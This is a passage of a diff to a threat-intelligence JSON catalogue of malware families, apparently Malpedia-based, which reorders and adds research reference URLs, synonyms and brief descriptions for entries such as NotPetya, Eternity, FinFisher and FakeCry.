"https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf", - "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/", - "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", + "https://www.cyberscoop.com/russian-hackers-notpetya-charges-gru/", + "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", + "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks", + "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/", "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/", - "https://aguinet.github.io//blog/2020/08/29/miasm-bootloader.html" + "https://www.welivesecurity.com/2017/06/27/new-ransomware-attack-hits-ukraine", + "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf", + "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", + "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/", + "https://www.youtube.com/watch?v=mrTdSdMMgnk", + "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", + "https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/", + "https://therecord.media/mondelez-and-zurich-reach-settlement-in-notpetya-cyberattack-insurance-suit/", + "https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/" ], "synonyms": [ "BadRabbit", @@ -23895,8 +25005,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_clipper", - "https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/", "https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group", + "https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/", "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/" ], "synonyms": [], @@ -23910,8 +25020,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_ransomware", - "https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/", "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/", + "https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/", "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/" ], "synonyms": [], @@ -23925,15 +25035,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_stealer", - "https://blog.sekoia.io/eternityteam-a-new-prominent-threat-group-on-underground-forums/", + "https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group", "https://twitter.com/3xp0rtblog/status/1509601846494695438", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/", "https://ke-la.com/information-stealers-a-new-landscape/", + "https://securityintelligence.com/news/eternity-gang-ransomware-as-a-service-telegram/", "https://blogs.blackberry.com/en/2022/06/threat-spotlight-eternity-project-maas-goes-on-and-on", "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/", - "https://www.zscaler.com/blogs/security-research/analysis-lilithbot-malware-and-eternity-threat-group", - "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "https://securityintelligence.com/news/eternity-gang-ransomware-as-a-service-telegram/", + "https://blog.sekoia.io/eternityteam-a-new-prominent-threat-group-on-underground-forums/", "https://blog.morphisec.com/nft-malware-new-evasion-abilities" ], "synonyms": [], @@ -23947,8 +25057,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_worm", - "https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/", "https://yoroi.company/research/a-deep-dive-into-eternity-group-a-new-emerging-cyber-threat/", + "https://www.bleepingcomputer.com/news/security/eternity-malware-kit-offers-stealer-miner-worm-ransomware-tools/", "https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/" ], "synonyms": [], @@ -23962,9 +25072,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot", - "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise", "https://www.secureworks.com/research/threat-profiles/bronze-globe", - "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html", + "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise" ], "synonyms": [ "HighTide" @@ -23994,8 +25104,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilextractor", - "https://www.netresec.com/?page=Blog&month=2023-04&post=EvilExtractor-Network-Forensics", - "https://www.fortinet.com/blog/threat-research/evil-extractor-all-in-one-stealer" + "https://www.fortinet.com/blog/threat-research/evil-extractor-all-in-one-stealer", + "https://www.netresec.com/?page=Blog&month=2023-04&post=EvilExtractor-Network-Forensics" ], "synonyms": [], "type": [] @@ -24009,8 +25119,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", - "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf" + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn" ], "synonyms": [ "Vidgrab" @@ -24025,13 +25135,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilnum", + "https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets", + "https://docs.broadcom.com/doc/ransom-and-malware-attacks-on-financial-services-institutions", + "https://mp.weixin.qq.com/s/lryl3a65uIz1AwZcfuzp1A", "https://www.proofpoint.com/us/blog/threat-insight/buy-sell-steal-evilnum-targets-cryptocurrency-forex-commodities", "https://github.com/eset/malware-ioc/tree/master/evilnum", - "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", - "https://docs.broadcom.com/doc/ransom-and-malware-attacks-on-financial-services-institutions", - "https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets", "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/", - "https://mp.weixin.qq.com/s/lryl3a65uIz1AwZcfuzp1A" + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/" ], "synonyms": [], "type": [] @@ -24040,7 +25150,7 @@ "value": "EVILNUM (Windows)" }, { - "description": "A wiper used against in an attack against Iran’s state broadcaster. Using campaign name coined by Check Point in lack of a better name for the wiper component.", + "description": "A wiper used against in an attack against Iran\u2019s state broadcaster. Using campaign name coined by Check Point in lack of a better name for the wiper component.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilplayout", @@ -24085,13 +25195,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel", - "https://www.wired.com/story/sandworm-centreon-russia-hack/", "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", + "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", + "https://www.wired.com/story/sandworm-centreon-russia-hack/", "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf", "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", - "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", - "https://attack.mitre.org/groups/G0034" + "https://attack.mitre.org/groups/G0034", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf" ], "synonyms": [], "type": [] @@ -24104,7 +25214,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exbyte", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware" + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", + "https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/" ], "synonyms": [], "type": [] @@ -24134,8 +25245,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool", "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", - "https://github.com/nccgroup/Royal_APT", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" ], "synonyms": [], "type": [] @@ -24162,9 +25273,9 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exmatter", "https://www.kroll.com/en/insights/publications/cyber/analyzing-exmatter-ransomware-data-exfiltration-tool", - "https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack", "https://www.accenture.com/us-en/blogs/security/stealbit-exmatter-exfiltration-tool-analysis", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration", + "https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack", "https://twitter.com/knight0x07/status/1461787168037240834?s=20" ], "synonyms": [], @@ -24174,7 +25285,7 @@ "value": "ExMatter" }, { - "description": "Ransomware.", + "description": "According to PCrisk, Exorcist is a ransomware-type malicious program. Systems infected with this malware experience data encryption and users receive ransom demands for decryption. During the encryption process, all compromised files are appended with an extension consisting of a ransom string of characters.\r\n\r\nFor example, a file originally named \"1.jpg\" could appear as something similar to \"1.jpg.rnyZoV\" following encryption. After this process is complete, Exorcist ransomware changes the desktop wallpaper and drops HTML applications - \"[random-string]-decrypt.hta\" (e.g. \"rnyZoV-decrypt.hta\") - into affected folders. These files contain identical ransom messages.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exorcist", @@ -24191,11 +25302,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.expiro", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Expiro", "https://youtu.be/3RYbkORtFnk", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Expiro", "https://github.com/GiacomoFerro/malware-analysis/blob/master/report/report-malware.pdf", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/expiro-infects-encrypts-files-to-complicate-repair/", "https://www.welivesecurity.com/2013/07/30/versatile-and-infectious-win64expiro-is-a-cross-platform-file-infector/", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/expiro-infects-encrypts-files-to-complicate-repair/" + "https://medium.com/walmartglobaltech/gazavat-expiro-dmsniff-connection-and-dga-analysis-8b965cc0221d" ], "synonyms": [ "Xpiro" @@ -24223,15 +25335,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat", - "https://www2.slideshare.net/ChiEnAshleyShen/hitcon-2020-cti-village-threat-hunting-and-campaign-tracking-workshoppptx/1", - "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", - "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html", - "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", - "https://citizenlab.ca/2015/12/packrat-report/", "https://blogs.360.cn/post/APT-C-44.html", - "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", + "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", - "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat" + "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat", + "https://citizenlab.ca/2015/12/packrat-report/", + "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", + "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html", + "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", + "https://www2.slideshare.net/ChiEnAshleyShen/hitcon-2020-cti-village-threat-hunting-and-campaign-tracking-workshoppptx/1" ], "synonyms": [ "ExtRat" @@ -24246,8 +25358,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid", - "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/", - "http://blog.talosintel.com/2017/01/Eye-Pyramid.html" + "http://blog.talosintel.com/2017/01/Eye-Pyramid.html", + "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/" ], "synonyms": [], "type": [] @@ -24260,10 +25372,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eyservice", + "https://www.epicturla.com/blog/the-lost-nazar", + "https://blog.malwarelab.pl/posts/nazar_eyservice/", "https://research.checkpoint.com/2020/nazar-spirits-of-the-past/", "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", - "https://blog.malwarelab.pl/posts/nazar_eyservice/", - "https://www.epicturla.com/blog/the-lost-nazar", "https://blog.malwarelab.pl/posts/nazar_eyservice_comm/" ], "synonyms": [], @@ -24277,8 +25389,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fabookie", - "https://ics-cert.kaspersky.com/publications/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/", - "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1" + "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1", + "https://ics-cert.kaspersky.com/publications/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/" ], "synonyms": [], "type": [] @@ -24286,14 +25398,27 @@ "uuid": "782aa125-42ff-4ca0-b9b1-362aac08566b", "value": "Fabookie" }, + { + "description": "Malware written in .NET that mimics WannaCry.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakecry", + "https://securelist.com/in-expetrpetyas-shadow-fakecry-ransomware-wave-hits-ukraine/78973/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c9ac3322-c176-444c-8d72-603430dca2d0", + "value": "FakeCry" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean", "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/", - "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv" + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv", + "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf" ], "synonyms": [ "Braviax" @@ -24308,8 +25433,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc", - "http://www.welivesecurity.com/2015/07/30/operation-potao-express/", - "https://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf" + "https://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf", + "http://www.welivesecurity.com/2015/07/30/operation-potao-express/" ], "synonyms": [], "type": [] @@ -24350,13 +25475,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny", - "https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/", + "https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1", - "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", - "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/", "https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf", + "https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/", + "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/", - "https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/" + "https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/" ], "synonyms": [ "DEMENTIAWHEEL" @@ -24384,8 +25509,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer", - "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/", "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/", + "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/", "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/" ], "synonyms": [], @@ -24398,6 +25523,7 @@ "description": "FastLoader is a small .NET downloader, which name comes from PDB strings seen in samples. It typically downloads TrickBot. It may create a list of processes and uploads it together with screenshot(s). In more recent versions, it employs simple anti-analysis checks (VM detection) and comes with string obfuscations. \r\n", "meta": { "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader", "https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader" ], "synonyms": [], @@ -24412,10 +25538,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos", "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/", - "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf", "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf", - "https://www.justice.gov/opa/pr/malware-author-pleads-guilty-role-transnational-cybercrime-organization-responsible-more-568", - "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-quick-and-easy-credit-card-theft/" + "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-quick-and-easy-credit-card-theft/", + "https://www.justice.gov/opa/pr/malware-author-pleads-guilty-role-transnational-cybercrime-organization-responsible-more-568" ], "synonyms": [], "type": [] @@ -24428,12 +25554,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatal_rat", + "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html", + "https://www.proofpoint.com/us/blog/threat-insight/chinese-malware-appears-earnest-across-cybercrime-threat-landscape", "https://www.youtube.com/watch?v=gjvnVZc11Vg", "https://cybersecurity.att.com/blogs/labs-research/new-sophisticated-rat-in-town-fatalrat-analysis", - "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html", - "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html" + "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html" + ], + "synonyms": [ + "Sainbox RAT" ], - "synonyms": [], "type": [] }, "uuid": "28697d08-27c0-47a9-bfd6-654cac4d55cc", @@ -24527,10 +25656,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo", "http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html", - "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html", - "https://en.wikipedia.org/wiki/Maksim_Yakubets", "https://feodotracker.abuse.ch/", - "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/" + "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html", + "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", + "https://en.wikipedia.org/wiki/Maksim_Yakubets" ], "synonyms": [ "Bugat", @@ -24546,8 +25675,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ffdroider", - "https://thehackernews.com/2022/04/researchers-warn-of-ffdroider-and.html", - "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users" + "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", + "https://thehackernews.com/2022/04/researchers-warn-of-ffdroider-and.html" ], "synonyms": [], "type": [] @@ -24556,18 +25685,18 @@ "value": "FFDroider" }, { - "description": "According to CyberArk, this malware is used to steal sensitive information, including login credentials, credit card information, cryptocurrency wallets and browser information from applications such as WinSCP, Discord, Google Chrome, Electrum, etc. It does all that by implementing a different approach than other stealers (we’ll cover it later). Additionally, FickerStealer can function as a File Grabber and collect additional files from the compromised machine, and it can act as a Downloader to download and execute several second-stage malware.", + "description": "According to CyberArk, this malware is used to steal sensitive information, including login credentials, credit card information, cryptocurrency wallets and browser information from applications such as WinSCP, Discord, Google Chrome, Electrum, etc. It does all that by implementing a different approach than other stealers (we\u2019ll cover it later). Additionally, FickerStealer can function as a File Grabber and collect additional files from the compromised machine, and it can act as a Downloader to download and execute several second-stage malware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer", - "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", - "https://twitter.com/3xp0rtblog/status/1321209656774135810", - "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", - "https://blogs.blackberry.com/en/2021/08/threat-thursday-ficker-infostealer-malware", "https://www.cyberark.com/resources/threat-research-blog/fickerstealer-a-new-rust-player-in-the-market", - "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://twitter.com/3xp0rtblog/status/1321209656774135810", + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "https://blogs.blackberry.com/en/2021/08/threat-thursday-ficker-infostealer-malware", "https://www.bleepingcomputer.com/news/security/fake-microsoft-store-spotify-sites-spread-info-stealing-malware/", + "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf", "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus" ], "synonyms": [], @@ -24594,8 +25723,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.filerase", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems" + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail" ], "synonyms": [], "type": [] @@ -24621,9 +25750,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://blogs.cisco.com/security/talos/poseidon", "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/", - "https://blogs.cisco.com/security/talos/poseidon" + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" ], "synonyms": [ "Poseidon" @@ -24638,28 +25767,28 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher", + "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", "https://www.msreverseengineering.com/blog/2018/2/21/finspy-vm-unpacking-tutorial-part-3-devirtualization", + "https://www.msreverseengineering.com/blog/2018/2/21/wsbjxrs1jjw7qi4trk9t3qy6hr7dye", + "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/", "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/", - "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", - "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-3-fixing-the-function-related-issues", - "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", - "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://www.codeandsec.com/FinFisher-Malware-Analysis-Part-2", + "https://www.binarly.io/posts/Design_issues_of_modern_EDR%E2%80%99s_bypassing_ETW-based_solutions/index.html", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", + "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-4-second-attempt-at-devirtualization", "https://netzpolitik.org/2022/nach-pfaendung-staatstrojaner-hersteller-finfisher-ist-geschlossen-und-bleibt-es-auch/", - "https://www.msreverseengineering.com/blog/2018/2/21/wsbjxrs1jjw7qi4trk9t3qy6hr7dye", - "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", - "https://www.binarly.io/posts/Design_issues_of_modern_EDR%E2%80%99s_bypassing_ETW-based_solutions/index.html", - "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-4-second-attempt-at-devirtualization", - "https://github.com/RolfRolles/FinSpyVM", - "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", - "https://securelist.com/apt-trends-report-q2-2019/91897/", - "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/", "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-2-first-attempt-at-devirtualization", + "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", + "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", + "https://github.com/RolfRolles/FinSpyVM", "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/", - "https://securelist.com/finspy-unseen-findings/104322/" + "https://securelist.com/finspy-unseen-findings/104322/", + "https://www.msreverseengineering.com/blog/2018/2/21/devirtualizing-finspy-phase-3-fixing-the-function-related-issues" ], "synonyms": [ "FinSpy" @@ -24669,6 +25798,21 @@ "uuid": "541b64bc-87ec-4cc2-aaee-329355987853", "value": "FinFisher RAT" }, + { + "description": "Recently, Check Point researchers spotted a targeted attack against officials within government finance authorities and representatives in several embassies in Europe. The attack, which starts with a malicious attachment disguised as a top secret US document, weaponizes TeamViewer, the popular remote access and desktop sharing software, to gain full control of the infected computer.\r\nThis is achieved by sideloading another DLL among the legit TeamViewer.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.finteam", + "https://research.checkpoint.com/finteam-trojanized-teamviewer-against-government-targets/" + ], + "synonyms": [ + "TeamBot" + ], + "type": [] + }, + "uuid": "045469d0-5bb2-4ed9-9ee2-a0a08f437433", + "value": "FINTEAM" + }, { "description": "", "meta": { @@ -24700,8 +25844,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.firechili", - 